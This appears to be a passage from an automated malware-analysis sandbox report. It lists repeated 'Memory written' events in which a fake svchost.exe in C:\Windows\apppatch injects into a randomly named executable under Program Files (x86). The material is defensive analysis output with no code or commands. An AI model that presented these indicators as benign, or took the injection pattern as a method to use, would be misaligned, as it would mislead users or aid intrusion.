Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2664000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E30000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E31000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E84000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2910000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2911000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2912000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2964000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B74000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C80000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C81000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2CD4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2260000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2261000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2262000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2834000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2360000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2361000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2362000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A14000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BC0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BC1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BC2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C14000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1334000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A00000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A01000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A02000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A54000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2714000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F10000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F11000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F64000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 21B0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 21B1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 21B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2204000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C80000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C81000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2CD4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B24000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3030000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3031000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3032000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3084000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2614000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2590000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2591000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2592000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25E4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2314000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E00000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E01000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E02000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E54000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2534000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2404000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2980000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2981000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2982000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29D4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 900000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 901000	Jump to behavior
